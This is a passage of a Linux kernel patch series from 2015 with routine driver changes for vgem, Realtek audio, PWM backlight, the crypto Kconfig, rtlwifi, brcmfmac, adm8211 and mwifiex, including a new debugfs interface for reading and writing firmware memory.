- * - * Authors: - * Ben Widawsky - * - */ - -#include -#include "vgem_drv.h" - -struct sg_table *vgem_gem_prime_get_sg_table(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - BUG_ON(obj->pages == NULL); - - return drm_prime_pages_to_sg(obj->pages, obj->base.size / PAGE_SIZE); -} - -int vgem_gem_prime_pin(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - return vgem_gem_get_pages(obj); -} - -void vgem_gem_prime_unpin(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - vgem_gem_put_pages(obj); -} - -void *vgem_gem_prime_vmap(struct drm_gem_object *gobj) -{ - struct drm_vgem_gem_object *obj = to_vgem_bo(gobj); - BUG_ON(obj->pages == NULL); - - return vmap(obj->pages, obj->base.size / PAGE_SIZE, 0, PAGE_KERNEL); -} - -void vgem_gem_prime_vunmap(struct drm_gem_object *obj, void *vaddr) -{ - vunmap(vaddr); -} - -struct drm_gem_object *vgem_gem_prime_import(struct drm_device *dev, - struct dma_buf *dma_buf) -{ - struct drm_vgem_gem_object *obj = NULL; - int ret; - - obj = kzalloc(sizeof(*obj), GFP_KERNEL); - if (obj == NULL) { - ret = -ENOMEM; - goto fail; - } - - ret = drm_gem_object_init(dev, &obj->base, dma_buf->size); - if (ret) { - ret = -ENOMEM; - goto fail_free; - } - - get_dma_buf(dma_buf); - - obj->base.dma_buf = dma_buf; - obj->use_dma_buf = true; - - return &obj->base; - -fail_free: - kfree(obj); -fail: - return ERR_PTR(ret); -} diff --git a/drivers/gpu/drm/vgem/vgem_drv.c b/drivers/gpu/drm/vgem/vgem_drv.c index cb3b43525b2d..7a207ca547be 100644 --- a/drivers/gpu/drm/vgem/vgem_drv.c +++ b/drivers/gpu/drm/vgem/vgem_drv.c @@ -302,22 +302,13 @@ static const struct file_operations vgem_driver_fops = { }; static struct drm_driver vgem_driver = { - .driver_features = DRIVER_GEM | DRIVER_PRIME, + .driver_features = DRIVER_GEM, .gem_free_object = vgem_gem_free_object, .gem_vm_ops = &vgem_gem_vm_ops, .ioctls = vgem_ioctls, .fops = &vgem_driver_fops, .dumb_create = vgem_gem_dumb_create, .dumb_map_offset = vgem_gem_dumb_map, - .prime_handle_to_fd = drm_gem_prime_handle_to_fd, - .prime_fd_to_handle = drm_gem_prime_fd_to_handle, - .gem_prime_export = drm_gem_prime_export, - .gem_prime_import = vgem_gem_prime_import, - .gem_prime_pin = vgem_gem_prime_pin, - .gem_prime_unpin = vgem_gem_prime_unpin, - .gem_prime_get_sg_table = vgem_gem_prime_get_sg_table, - .gem_prime_vmap = vgem_gem_prime_vmap, - .gem_prime_vunmap = vgem_gem_prime_vunmap, .name = DRIVER_NAME, .desc = DRIVER_DESC, .date = DRIVER_DATE, diff --git a/drivers/gpu/drm/vgem/vgem_drv.h b/drivers/gpu/drm/vgem/vgem_drv.h index 57ab4d8f41f9..e9f92f7ee275 100644 --- a/drivers/gpu/drm/vgem/vgem_drv.h +++ b/drivers/gpu/drm/vgem/vgem_drv.h @@ -43,15 +43,4 @@ struct drm_vgem_gem_object { extern void vgem_gem_put_pages(struct drm_vgem_gem_object *obj); extern int vgem_gem_get_pages(struct drm_vgem_gem_object *obj); -/* vgem_dma_buf.c */ -extern struct sg_table *vgem_gem_prime_get_sg_table( - struct drm_gem_object *gobj); -extern int vgem_gem_prime_pin(struct drm_gem_object *gobj); -extern void vgem_gem_prime_unpin(struct drm_gem_object *gobj); -extern void *vgem_gem_prime_vmap(struct drm_gem_object *gobj); -extern void vgem_gem_prime_vunmap(struct drm_gem_object *obj, void *vaddr); -extern struct drm_gem_object *vgem_gem_prime_import(struct drm_device *dev, - struct dma_buf *dma_buf); - - #endif From 823245026ead28a244cb9df5ae79b511da128606 Mon Sep 17 00:00:00 2001 From: Kailang Yang Date: Mon, 25 May 2015 17:16:49 +0800 Subject: [PATCH 
192/872] ALSA: hda/realtek - Add ALC256 alias name for Dell Add ALC3246 for Dell platform. Signed-off-by: Kailang Yang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 31f8f13be907..fc0ccc78bdc7 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -884,6 +884,7 @@ static struct alc_codec_rename_pci_table rename_pci_tbl[] = { { 0x10ec0275, 0x1028, 0, "ALC3260" }, { 0x10ec0899, 0x1028, 0, "ALC3861" }, { 0x10ec0298, 0x1028, 0, "ALC3266" }, + { 0x10ec0256, 0x1028, 0, "ALC3246" }, { 0x10ec0670, 0x1025, 0, "ALC669X" }, { 0x10ec0676, 0x1025, 0, "ALC679X" }, { 0x10ec0282, 0x1043, 0, "ALC3229" }, From 68feaca0b13e453aa14ee064c1736202b48b342f Mon Sep 17 00:00:00 2001 From: Nicolas Ferre Date: Thu, 19 Feb 2015 10:30:14 +0100 Subject: [PATCH 193/872] backlight: pwm: Handle EPROBE_DEFER while requesting the PWM When trying to request the PWM device with devm_pwm_get(), the EPROBE_DEFER flag is not handled properly. It can lead to the PWM not being found. Signed-off-by: Boris Brezillon Signed-off-by: Nicolas Ferre Acked-by: Thierry Reding Signed-off-by: Lee Jones --- drivers/video/backlight/pwm_bl.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/drivers/video/backlight/pwm_bl.c b/drivers/video/backlight/pwm_bl.c index 3a145a643e0d..6897f1c1bc73 100644 --- a/drivers/video/backlight/pwm_bl.c +++ b/drivers/video/backlight/pwm_bl.c @@ -274,6 +274,10 @@ static int pwm_backlight_probe(struct platform_device *pdev) pb->pwm = devm_pwm_get(&pdev->dev, NULL); if (IS_ERR(pb->pwm)) { + ret = PTR_ERR(pb->pwm); + if (ret == -EPROBE_DEFER) + goto err_alloc; + dev_err(&pdev->dev, "unable to request PWM, trying legacy API\n"); pb->legacy = true; pb->pwm = pwm_request(data->pwm_id, "pwm-backlight"); From f858c7bcca8c20761a20593439fe998b4b67e86b Mon Sep 17 00:00:00 2001 From: Herbert Xu Date: Tue, 26 May 2015 15:32:42 +0800 Subject: [PATCH 194/872] crypto: algif_aead - Disable AEAD user-space for now The newly added AEAD user-space isn't quite ready for prime time just yet. In particular it is conflicting with the AEAD single SG list interface change so this patch disables it now. Once the SG list stuff is completely done we can then renable this interface. Signed-off-by: Herbert Xu --- crypto/Kconfig | 9 --------- 1 file changed, 9 deletions(-) diff --git a/crypto/Kconfig b/crypto/Kconfig index 8aaf298a80e1..362905e7c841 100644 --- a/crypto/Kconfig +++ b/crypto/Kconfig @@ -1512,15 +1512,6 @@ config CRYPTO_USER_API_RNG This option enables the user-spaces interface for random number generator algorithms. -config CRYPTO_USER_API_AEAD - tristate "User-space interface for AEAD cipher algorithms" - depends on NET - select CRYPTO_AEAD - select CRYPTO_USER_API - help - This option enables the user-spaces interface for AEAD - cipher algorithms. - config CRYPTO_HASH_INFO bool From a706b41b8200584f10f6e4cac30c14c536d1299b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Lauri=20Kentt=C3=A4?= Date: Fri, 8 May 2015 22:01:53 +0300 Subject: [PATCH 195/872] rtlwifi: rtl8188ee: Fix pwrseqcmd.h include path. 
MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Lauri Kenttä Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c | 2 +- drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c index ef28c8ea1e84..02013df968a0 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.c @@ -23,7 +23,7 @@ * *****************************************************************************/ -#include "pwrseqcmd.h" +#include "../pwrseqcmd.h" #include "pwrseq.h" /* drivers should parse below arrays and do the corresponding actions */ diff --git a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h index 79103347d967..f2d9c6116e5c 100644 --- a/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h +++ b/drivers/net/wireless/rtlwifi/rtl8188ee/pwrseq.h @@ -26,7 +26,7 @@ #ifndef __RTL8723E_PWRSEQ_H__ #define __RTL8723E_PWRSEQ_H__ -#include "pwrseqcmd.h" +#include "../pwrseqcmd.h" /* Check document WM-20110607-Paul-RTL8188EE_Power_Architecture-R02.vsd * There are 6 HW Power States: * 0: POFF--Power Off From dacc7e1939852b7e85f64720bb1cb4563dbd5489 Mon Sep 17 00:00:00 2001 From: Taehee Yoo Date: Sat, 9 May 2015 18:15:23 +0900 Subject: [PATCH 196/872] rtlwifi: rtl8192cu: Remove setting REG_BCN_MAX_ERR code in _rtl92cu_set_media_status(). The initialization routine sets REG_BCN_MAX_ERR to 0xFF, and _rtl92cu_set_media_status() sets it to the same value, so remove this redundant write. Signed-off-by: Taehee Yoo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192cu/hw.c | 1 - 1 file changed, 1 deletion(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c index d310d55d800e..3c1639ba7f99 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c @@ -1323,7 +1323,6 @@ static int _rtl92cu_set_media_status(struct ieee80211_hw *hw, enum led_ctl_mode ledaction = LED_CTL_NO_LINK; bt_msr &= 0xfc; - rtl_write_byte(rtlpriv, REG_BCN_MAX_ERR, 0xFF); if (type == NL80211_IFTYPE_UNSPECIFIED || type == NL80211_IFTYPE_STATION) { _rtl92cu_stop_tx_beacon(hw); From bfe3d2bf6c2356fbe6be7c5200053accf35721d4 Mon Sep 17 00:00:00 2001 From: Taehee Yoo Date: Sat, 9 May 2015 18:16:51 +0900 Subject: [PATCH 197/872] rtlwifi: rtl8192cu: Remove rtl92c_init_beacon_max_error's parameter The "infra_mode" parameter of rtl92c_init_beacon_max_error() is not used, so remove it.
Signed-off-by: Taehee Yoo Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/rtl8192cu/hw.c | 2 +- drivers/net/wireless/rtlwifi/rtl8192cu/mac.c | 2 +- drivers/net/wireless/rtlwifi/rtl8192cu/mac.h | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c index 3c1639ba7f99..189859617db8 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/hw.c @@ -889,7 +889,7 @@ static int _rtl92cu_init_mac(struct ieee80211_hw *hw) rtl92c_set_min_space(hw, IS_92C_SERIAL(rtlhal->version)); rtl92c_init_beacon_parameters(hw, rtlhal->version); rtl92c_init_ampdu_aggregation(hw); - rtl92c_init_beacon_max_error(hw, true); + rtl92c_init_beacon_max_error(hw); return err; } diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c index adb810794eef..f3db6bc8596a 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.c @@ -613,7 +613,7 @@ void rtl92c_init_ampdu_aggregation(struct ieee80211_hw *hw) rtl_write_word(rtlpriv, 0x4CA, 0x0708); } -void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw, bool infra_mode) +void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw) { struct rtl_priv *rtlpriv = rtl_priv(hw); diff --git a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h index bf53652e4edd..58548e8f2c41 100644 --- a/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h +++ b/drivers/net/wireless/rtlwifi/rtl8192cu/mac.h @@ -66,7 +66,7 @@ void rtl92c_init_edca_param(struct ieee80211_hw *hw, void rtl92c_init_edca(struct ieee80211_hw *hw); void rtl92c_init_ampdu_aggregation(struct ieee80211_hw *hw); -void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw, bool infra_mode); +void rtl92c_init_beacon_max_error(struct ieee80211_hw *hw); void rtl92c_init_rdg_setting(struct ieee80211_hw *hw); void rtl92c_init_retry_function(struct ieee80211_hw *hw); From f0992ace680c7a1b5b62da2103602bd7e6eb63cd Mon Sep 17 00:00:00 2001 From: "Fu, Zhonghui" Date: Mon, 11 May 2015 10:41:32 +0800 Subject: [PATCH 198/872] brcmfmac: prohibit ACPI power management for brcmfmac driver ACPI will manage WiFi chip's power state during suspend/resume process on some tablet platforms(such as ASUS T100TA). This is not supported by brcmfmac driver now, and the context of WiFi chip will be damaged after resume. This patch informs ACPI not to manage WiFi chip's power state. 
Signed-off-by: Zhonghui Fu Acked-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c index 8a69544485a9..b0d0ff5d82c0 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/bcmsdh.c @@ -33,6 +33,7 @@ #include #include #include +#include #include #include @@ -1122,6 +1123,8 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, int err; struct brcmf_sdio_dev *sdiodev; struct brcmf_bus *bus_if; + struct device *dev; + struct acpi_device *adev; brcmf_dbg(SDIO, "Enter\n"); brcmf_dbg(SDIO, "Class=%x\n", func->class); @@ -1129,6 +1132,12 @@ static int brcmf_ops_sdio_probe(struct sdio_func *func, brcmf_dbg(SDIO, "sdio device ID: 0x%04x\n", func->device); brcmf_dbg(SDIO, "Function#: %d\n", func->num); + /* prohibit ACPI power management for this device */ + dev = &func->dev; + adev = ACPI_COMPANION(dev); + if (adev) + adev->flags.power_manageable = 0; + /* Consume func num 1 but dont do anything with it. */ if (func->num == 1) return 0; From f5c65f38912e38fc035dd1e515c1442bf62a8dab Mon Sep 17 00:00:00 2001 From: Okash Khawaja Date: Mon, 11 May 2015 12:53:25 +0100 Subject: [PATCH 199/872] adm8211: fix checkpatch errors for indentation and new line This patch fixes these checkpatch.pl errors around a single switch-case block: ERROR: switch and case should be at the same indent ERROR: trailing statements should be on next line More specifically, the fix has been applied to the five occurances of the errors listed below. ERROR: switch and case should be at the same indent #1100: FILE: adm8211.c:1100: + switch (cline) { [...] + default: reg |= (0x0 << 14); ERROR: trailing statements should be on next line #1101: FILE: adm8211.c:1101: + case 0x8: reg |= (0x1 << 14); ERROR: trailing statements should be on next line #1103: FILE: adm8211.c:1103: + case 0x16: reg |= (0x2 << 14); ERROR: trailing statements should be on next line #1105: FILE: adm8211.c:1105: + case 0x32: reg |= (0x3 << 14); ERROR: trailing statements should be on next line #1107: FILE: adm8211.c:1107: + default: reg |= (0x0 << 14); Signed-off-by: Okash Khawaja Signed-off-by: Kalle Valo --- drivers/net/wireless/adm8211.c | 20 ++++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/drivers/net/wireless/adm8211.c b/drivers/net/wireless/adm8211.c index 413528295d72..faf277e0a646 100644 --- a/drivers/net/wireless/adm8211.c +++ b/drivers/net/wireless/adm8211.c @@ -1098,14 +1098,18 @@ static void adm8211_hw_init(struct ieee80211_hw *dev) pci_read_config_byte(priv->pdev, PCI_CACHE_LINE_SIZE, &cline); switch (cline) { - case 0x8: reg |= (0x1 << 14); - break; - case 0x16: reg |= (0x2 << 14); - break; - case 0x32: reg |= (0x3 << 14); - break; - default: reg |= (0x0 << 14); - break; + case 0x8: + reg |= (0x1 << 14); + break; + case 0x16: + reg |= (0x2 << 14); + break; + case 0x32: + reg |= (0x3 << 14); + break; + default: + reg |= (0x0 << 14); + break; } } From fe0a483ecf4458e94ebe58d7fedc6d56e21eed56 Mon Sep 17 00:00:00 2001 From: Okash Khawaja Date: Mon, 11 May 2015 12:58:31 +0100 Subject: [PATCH 200/872] adm8211: fixed the possible pci cache line sizes inside switch-case The PCI cache line size value was being compared against decimal values prefixed with 0x. Fixed the literals to use the correct hex values. This has not been tested due to lack of hardware. 
However, the value in `cline` is PCI cache line size, which is the CPU's cache line size. It is less likely for cache line sizes to be 22 or 50, and more likely for them to be 16 or 32. Also, as far as I understand, cache line size is used for things like aligning DMA requests with CPU cache line, which improve performance but wouldn't break anything if the value doesn't match. In this case, we will fall through to the default case which leaves `reg` unchanged. Signed-off-by: Okash Khawaja Signed-off-by: Kalle Valo --- drivers/net/wireless/adm8211.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/adm8211.c b/drivers/net/wireless/adm8211.c index faf277e0a646..8c283fcd843d 100644 --- a/drivers/net/wireless/adm8211.c +++ b/drivers/net/wireless/adm8211.c @@ -1101,10 +1101,10 @@ static void adm8211_hw_init(struct ieee80211_hw *dev) case 0x8: reg |= (0x1 << 14); break; - case 0x16: + case 0x10: reg |= (0x2 << 14); break; - case 0x32: + case 0x20: reg |= (0x3 << 14); break; default: From 111c61054d86f3c8586146819aa905e14026fc4d Mon Sep 17 00:00:00 2001 From: Daniel Drake Date: Mon, 11 May 2015 14:00:27 -0500 Subject: [PATCH 201/872] rtlwifi: btcoexist: Fix interference between rtl8723be and Bluetooth During usage of the new Bluetooth driver for Realtek devices, it was found that BT scans were inhibited for the RTL8723BE when wireless was active. The exact cause of this interference is not known yet, but a satisfactory work around has been found that does not seem to have any visible side effects. Signed-off-by: Daniel Drake Signed-off-by: Larry Finger Cc: Shao Fu Signed-off-by: Kalle Valo --- drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c b/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c index cefe26991421..f2b9d11adc9e 100644 --- a/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c +++ b/drivers/net/wireless/rtlwifi/btcoexist/halbtc8723b2ant.c @@ -1286,8 +1286,11 @@ static void btc8723b2ant_ps_tdma(struct btc_coexist *btcoexist, bool force_exec, 0x12, 0xe1, 0x90); break; case 3: - btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x1c, - 0x3, 0xf1, 0x90); + /* This call breaks BT when wireless is active - + * comment it out for now until a better fix is found: + * btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x1c, + * 0x3, 0xf1, 0x90); + */ break; case 4: btc8723b2ant_set_fw_ps_tdma(btcoexist, 0xe3, 0x10, From c2c6c85fca47f4c5ac99d482b64d59dbd142117c Mon Sep 17 00:00:00 2001 From: Chin-ran Lo Date: Tue, 12 May 2015 00:48:17 +0530 Subject: [PATCH 202/872] mwifiex: add support for FW memory read/write operations This patch adds support for FW memory read/write operations via debugfs. This is useful during debugging FW issues. 
Examples: For reading FW memory location: echo r 0x01ac > /sys/kernel/debug/mwifiex/mlan0/memrw cat /sys/kernel/debug/mwifiex/mlan0/memrw For writing FW memory location: echo w 0x01ac 0x55aa > /sys/kernel/debug/mwifiex/mlan0/memrw Signed-off-by: Chin-ran Lo Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/debugfs.c | 79 ++++++++++++++++++++++ drivers/net/wireless/mwifiex/fw.h | 9 +++ drivers/net/wireless/mwifiex/ioctl.h | 5 ++ drivers/net/wireless/mwifiex/main.h | 1 + drivers/net/wireless/mwifiex/sta_cmd.c | 23 +++++++ drivers/net/wireless/mwifiex/sta_cmdresp.c | 16 +++++ 6 files changed, 133 insertions(+) diff --git a/drivers/net/wireless/mwifiex/debugfs.c b/drivers/net/wireless/mwifiex/debugfs.c index 1fb329dc6744..414ee2da9bfc 100644 --- a/drivers/net/wireless/mwifiex/debugfs.c +++ b/drivers/net/wireless/mwifiex/debugfs.c @@ -535,6 +535,83 @@ mwifiex_regrdwr_read(struct file *file, char __user *ubuf, return ret; } +/* Proc memrw file write handler. + * This function is called when the 'memrw' file is opened for writing + * This function can be used to write to a memory location. + */ +static ssize_t +mwifiex_memrw_write(struct file *file, const char __user *ubuf, size_t count, + loff_t *ppos) +{ + int ret; + char cmd; + struct mwifiex_ds_mem_rw mem_rw; + u16 cmd_action; + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (void *)addr; + size_t buf_size = min(count, (size_t)(PAGE_SIZE - 1)); + + if (!buf) + return -ENOMEM; + + if (copy_from_user(buf, ubuf, buf_size)) { + ret = -EFAULT; + goto done; + } + + ret = sscanf(buf, "%c %x %x", &cmd, &mem_rw.addr, &mem_rw.value); + if (ret != 3) { + ret = -EINVAL; + goto done; + } + + if ((cmd == 'r') || (cmd == 'R')) { + cmd_action = HostCmd_ACT_GEN_GET; + mem_rw.value = 0; + } else if ((cmd == 'w') || (cmd == 'W')) { + cmd_action = HostCmd_ACT_GEN_SET; + } else { + ret = -EINVAL; + goto done; + } + + memcpy(&priv->mem_rw, &mem_rw, sizeof(mem_rw)); + if (mwifiex_send_cmd(priv, HostCmd_CMD_MEM_ACCESS, cmd_action, 0, + &mem_rw, true)) + ret = -1; + else + ret = count; + +done: + free_page(addr); + return ret; +} + +/* Proc memrw file read handler. + * This function is called when the 'memrw' file is opened for reading + * This function can be used to read from a memory location. 
+ */ +static ssize_t +mwifiex_memrw_read(struct file *file, char __user *ubuf, + size_t count, loff_t *ppos) +{ + struct mwifiex_private *priv = (void *)file->private_data; + unsigned long addr = get_zeroed_page(GFP_KERNEL); + char *buf = (char *)addr; + int ret, pos = 0; + + if (!buf) + return -ENOMEM; + + pos += snprintf(buf, PAGE_SIZE, "0x%x 0x%x\n", priv->mem_rw.addr, + priv->mem_rw.value); + ret = simple_read_from_buffer(ubuf, count, ppos, buf, pos); + + free_page(addr); + return ret; +} + static u32 saved_offset = -1, saved_bytes = -1; /* @@ -749,6 +826,7 @@ MWIFIEX_DFS_FILE_READ_OPS(getlog); MWIFIEX_DFS_FILE_READ_OPS(fw_dump); MWIFIEX_DFS_FILE_OPS(regrdwr); MWIFIEX_DFS_FILE_OPS(rdeeprom); +MWIFIEX_DFS_FILE_OPS(memrw); MWIFIEX_DFS_FILE_OPS(hscfg); MWIFIEX_DFS_FILE_OPS(histogram); @@ -773,6 +851,7 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv) MWIFIEX_DFS_ADD_FILE(regrdwr); MWIFIEX_DFS_ADD_FILE(rdeeprom); MWIFIEX_DFS_ADD_FILE(fw_dump); + MWIFIEX_DFS_ADD_FILE(memrw); MWIFIEX_DFS_ADD_FILE(hscfg); MWIFIEX_DFS_ADD_FILE(histogram); } diff --git a/drivers/net/wireless/mwifiex/fw.h b/drivers/net/wireless/mwifiex/fw.h index 59d8964dd0dc..c404390cb0fa 100644 --- a/drivers/net/wireless/mwifiex/fw.h +++ b/drivers/net/wireless/mwifiex/fw.h @@ -323,6 +323,7 @@ enum MWIFIEX_802_11_PRIVACY_FILTER { #define HostCmd_CMD_802_11_SUBSCRIBE_EVENT 0x0075 #define HostCmd_CMD_802_11_TX_RATE_QUERY 0x007f #define HostCmd_CMD_802_11_IBSS_COALESCING_STATUS 0x0083 +#define HostCmd_CMD_MEM_ACCESS 0x0086 #define HostCmd_CMD_CFG_DATA 0x008f #define HostCmd_CMD_VERSION_EXT 0x0097 #define HostCmd_CMD_MEF_CFG 0x009a @@ -1576,6 +1577,13 @@ struct mwifiex_ie_types_extcap { u8 ext_capab[0]; } __packed; +struct host_cmd_ds_mem_access { + __le16 action; + __le16 reserved; + __le32 addr; + __le32 value; +}; + struct mwifiex_ie_types_qos_info { struct mwifiex_ie_types_header header; u8 qos_info; @@ -1958,6 +1966,7 @@ struct host_cmd_ds_command { struct host_cmd_ds_p2p_mode_cfg mode_cfg; struct host_cmd_ds_802_11_ibss_status ibss_coalescing; struct host_cmd_ds_mef_cfg mef_cfg; + struct host_cmd_ds_mem_access mem; struct host_cmd_ds_mac_reg_access mac_reg; struct host_cmd_ds_bbp_reg_access bbp_reg; struct host_cmd_ds_rf_reg_access rf_reg; diff --git a/drivers/net/wireless/mwifiex/ioctl.h b/drivers/net/wireless/mwifiex/ioctl.h index d2b05c3a96da..224c993e62e9 100644 --- a/drivers/net/wireless/mwifiex/ioctl.h +++ b/drivers/net/wireless/mwifiex/ioctl.h @@ -342,6 +342,11 @@ struct mwifiex_ds_read_eeprom { u8 value[MAX_EEPROM_DATA]; }; +struct mwifiex_ds_mem_rw { + u32 addr; + u32 value; +}; + #define IEEE_MAX_IE_SIZE 256 #define MWIFIEX_IE_HDR_SIZE (sizeof(struct mwifiex_ie) - IEEE_MAX_IE_SIZE) diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index fe1256044a6c..b387d5a9f1e6 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -611,6 +611,7 @@ struct mwifiex_private { struct delayed_work dfs_chan_sw_work; struct cfg80211_beacon_data beacon_after; struct mwifiex_11h_intf_state state_11h; + struct mwifiex_ds_mem_rw mem_rw; }; diff --git a/drivers/net/wireless/mwifiex/sta_cmd.c b/drivers/net/wireless/mwifiex/sta_cmd.c index 49422f2a5380..a76d6a4340d0 100644 --- a/drivers/net/wireless/mwifiex/sta_cmd.c +++ b/drivers/net/wireless/mwifiex/sta_cmd.c @@ -1071,6 +1071,26 @@ static int mwifiex_cmd_ibss_coalescing_status(struct host_cmd_ds_command *cmd, return 0; } +/* This function prepares command buffer to get/set memory location value. 
+ */ +static int +mwifiex_cmd_mem_access(struct host_cmd_ds_command *cmd, u16 cmd_action, + void *pdata_buf) +{ + struct mwifiex_ds_mem_rw *mem_rw = (void *)pdata_buf; + struct host_cmd_ds_mem_access *mem_access = (void *)&cmd->params.mem; + + cmd->command = cpu_to_le16(HostCmd_CMD_MEM_ACCESS); + cmd->size = cpu_to_le16(sizeof(struct host_cmd_ds_mem_access) + + S_DS_GEN); + + mem_access->action = cpu_to_le16(cmd_action); + mem_access->addr = cpu_to_le32(mem_rw->addr); + mem_access->value = cpu_to_le32(mem_rw->value); + + return 0; +} + /* * This function prepares command to set/get register value. * @@ -1885,6 +1905,9 @@ int mwifiex_sta_prepare_cmd(struct mwifiex_private *priv, uint16_t cmd_no, case HostCmd_CMD_802_11_SCAN_EXT: ret = mwifiex_cmd_802_11_scan_ext(priv, cmd_ptr, data_buf); break; + case HostCmd_CMD_MEM_ACCESS: + ret = mwifiex_cmd_mem_access(cmd_ptr, cmd_action, data_buf); + break; case HostCmd_CMD_MAC_REG_ACCESS: case HostCmd_CMD_BBP_REG_ACCESS: case HostCmd_CMD_RF_REG_ACCESS: diff --git a/drivers/net/wireless/mwifiex/sta_cmdresp.c b/drivers/net/wireless/mwifiex/sta_cmdresp.c index 88dc6b672ef4..efe31a2a90c9 100644 --- a/drivers/net/wireless/mwifiex/sta_cmdresp.c +++ b/drivers/net/wireless/mwifiex/sta_cmdresp.c @@ -741,6 +741,19 @@ mwifiex_ret_p2p_mode_cfg(struct mwifiex_private *priv, return 0; } +/* This function handles the command response of mem_access command + */ +static int +mwifiex_ret_mem_access(struct mwifiex_private *priv, + struct host_cmd_ds_command *resp, void *pioctl_buf) +{ + struct host_cmd_ds_mem_access *mem = (void *)&resp->params.mem; + + priv->mem_rw.addr = le32_to_cpu(mem->addr); + priv->mem_rw.value = le32_to_cpu(mem->value); + + return 0; +} /* * This function handles the command response of register access. * @@ -1103,6 +1116,9 @@ int mwifiex_process_sta_cmdresp(struct mwifiex_private *priv, u16 cmdresp_no, case HostCmd_CMD_802_11_IBSS_COALESCING_STATUS: ret = mwifiex_ret_ibss_coalescing_status(priv, resp); break; + case HostCmd_CMD_MEM_ACCESS: + ret = mwifiex_ret_mem_access(priv, resp, data_buf); + break; case HostCmd_CMD_MAC_REG_ACCESS: case HostCmd_CMD_BBP_REG_ACCESS: case HostCmd_CMD_RF_REG_ACCESS: From c687a0077faa0d24fe97a4434974f32bd359beb7 Mon Sep 17 00:00:00 2001 From: Zhaoyang Liu Date: Tue, 12 May 2015 00:48:18 +0530 Subject: [PATCH 203/872] mwifiex: add prints debug ctrl support This patch adds support for debugging print control in mwifiex driver. The debug level can be controlled via either by modules load parameter debug_mask or by writing to debug_mask in debugfs file. Signed-off-by: Zhaoyang Liu Signed-off-by: Cathy Luo Signed-off-by: Avinash Patil Signed-off-by: Kalle Valo --- drivers/net/wireless/mwifiex/debugfs.c | 63 ++++++++++++++++++++++++++ drivers/net/wireless/mwifiex/ioctl.h | 1 + drivers/net/wireless/mwifiex/main.c | 5 ++ drivers/net/wireless/mwifiex/main.h | 40 ++++++++++++++++ drivers/net/wireless/mwifiex/util.c | 3 ++ 5 files changed, 112 insertions(+) diff --git a/drivers/net/wireless/mwifiex/debugfs.c 